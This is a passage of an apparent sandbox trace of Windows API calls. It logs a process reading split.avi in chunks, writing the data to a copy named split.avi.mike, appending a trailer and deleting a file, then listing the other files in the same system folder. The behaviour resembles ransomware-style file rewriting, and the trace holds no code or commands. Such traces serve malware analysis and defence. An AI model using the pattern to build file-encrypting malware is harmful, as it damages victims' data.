dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.086] GetFileType (hFile=0x264) returned 0x1 [0045.086] GetFileType (hFile=0x264) returned 0x1 [0045.086] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x28220 [0045.086] WriteFile (in: hFile=0x264, lpBuffer=0x2254b10*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2254b10*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.087] CloseHandle (hObject=0x264) returned 1 [0045.088] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.088] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.088] GetFileType (hFile=0x264) returned 0x1 [0045.088] GetFileType (hFile=0x264) returned 0x1 [0045.088] SetFilePointer (in: hFile=0x264, lDistanceToMove=174080, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2a800 [0045.089] ReadFile (in: hFile=0x264, lpBuffer=0x2257550, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2257550*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.089] CloseHandle (hObject=0x264) returned 1 [0045.090] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.090] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.090] GetFileType (hFile=0x264) returned 0x1 [0045.090] GetFileType (hFile=0x264) returned 0x1 [0045.090] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2aa20 [0045.090] WriteFile (in: hFile=0x264, lpBuffer=0x2261ab8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x2261ab8*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.090] CloseHandle (hObject=0x264) returned 1 [0045.092] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.092] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.092] GetFileType (hFile=0x264) returned 0x1 [0045.092] GetFileType (hFile=0x264) returned 0x1 [0045.092] SetFilePointer (in: hFile=0x264, lDistanceToMove=184320, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2d000 [0045.092] ReadFile (in: hFile=0x264, lpBuffer=0x22644f8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22644f8*, lpNumberOfBytesRead=0x2af080*=0x2600, lpOverlapped=0x0) returned 1 [0045.093] CloseHandle (hObject=0x264) returned 1 [0045.094] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.094] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.094] GetFileType (hFile=0x264) returned 0x1 [0045.094] GetFileType (hFile=0x264) returned 0x1 [0045.094] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2d220 [0045.094] WriteFile (in: hFile=0x264, lpBuffer=0x226e460*, nNumberOfBytesToWrite=0x2600, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x226e460*, lpNumberOfBytesWritten=0x2af094*=0x2600, lpOverlapped=0x0) returned 1 [0045.094] CloseHandle (hObject=0x264) returned 1 [0045.096] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.096] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.096] GetFileType (hFile=0x264) returned 0x1 [0045.096] GetFileType (hFile=0x264) returned 0x1 [0045.097] WriteFile (in: hFile=0x264, lpBuffer=0x2272da0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2272da0*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0045.097] CloseHandle (hObject=0x264) returned 1 [0045.099] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.099] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.099] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4ff7960, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4ff7960, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe514e5c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2f820)) returned 1 [0045.099] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.099] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.099] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x22744b0 | out: lpFileInformation=0x22744b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4ff7960, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4ff7960, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe514e5c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2f820)) returned 1 [0045.099] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.099] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", dwFileAttributes=0x80) returned 0 [0045.100] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.100] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0045.101] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4ff7960, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4ff7960, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe514e5c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x2f820)) returned 1 [0045.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0045.101] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpFilePart=0x0) returned 0x42 [0045.101] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike", lpFilePart=0x0) returned 0x47 [0045.101] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi.mike")) returned 1 [0045.103] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui", lpFilePart=0x0) returned 0x47 [0045.103] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui", lpFilePart=0x0) returned 0x48 [0045.103] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui", lpFilePart=0x0) returned 0x47 [0045.103] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui", lpFilePart=0x0) returned 0x48 [0045.103] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui", lpFilePart=0x0) returned 0x47 [0045.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0045.104] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", lpFilePart=0x0) returned 0x38 [0045.104] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\", lpFilePart=0x0) returned 0x39 [0045.104] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe4ff7960, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe514e5c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0045.104] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe4ff7960, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe514e5c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.104] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a407849, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9a407849, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x9a407849, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x15e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="boxed-correct.avi", cAlternateFileName="")) returned 1 [0045.104] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23b3de0, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x23b3de0, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a49fdc1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="boxed-delete.avi", cAlternateFileName="")) returned 1 [0045.104] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23d9f3d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x23d9f3d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a4c5f1f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x8200, dwReserved0=0x0, dwReserved1=0x0, cFileName="boxed-join.avi", cAlternateFileName="")) returned 1 [0045.105] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24261f7, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x24261f7, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a538339, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf600, dwReserved0=0x0, dwReserved1=0x0, cFileName="boxed-split.avi", cAlternateFileName="")) returned 1 [0045.105] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x244c354, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x244c354, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a55e497, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x30200, dwReserved0=0x0, dwReserved1=0x0, cFileName="correct.avi", cAlternateFileName="")) returned 1 [0045.105] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24be76b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x24be76b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5845f5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="delete.avi", cAlternateFileName="")) returned 1 [0045.105] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlickLearningWizard.exe.mui", cAlternateFileName="")) returned 1 [0045.105] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc8723b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xe067905, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xdc8723b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkObj.dll.mui", cAlternateFileName="")) returned 1 [0045.105] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkWatson.exe.mui", cAlternateFileName="")) returned 1 [0045.105] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="InputPersonalization.exe.mui", cAlternateFileName="")) returned 1 [0045.106] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x5800, dwReserved0=0x0, dwReserved1=0x0, cFileName="IPSEventLogMsg.dll.mui", cAlternateFileName="")) returned 1 [0045.106] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="IpsMigrationPlugin.dll.mui", cAlternateFileName="")) returned 1 [0045.106] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x250aa25, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x250aa25, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5aa753, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36400, dwReserved0=0x0, dwReserved1=0x0, cFileName="join.avi", cAlternateFileName="")) returned 1 [0045.106] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="micaut.dll.mui", cAlternateFileName="")) returned 1 [0045.106] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="mip.exe.mui", cAlternateFileName="")) returned 1 [0045.106] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mshwLatin.dll.mui", cAlternateFileName="")) returned 1 [0045.106] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeca1847, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xf901a42, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xeca1847, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="rtscom.dll.mui", cAlternateFileName="")) returned 1 [0045.107] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShapeCollector.exe.mui", cAlternateFileName="")) returned 1 [0045.107] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25c90f6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x25c90f6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5d08b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2f600, dwReserved0=0x0, dwReserved1=0x0, cFileName="split.avi", cAlternateFileName="")) returned 1 [0045.107] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa23a9ac, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xa5a884b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xa23a9ac, 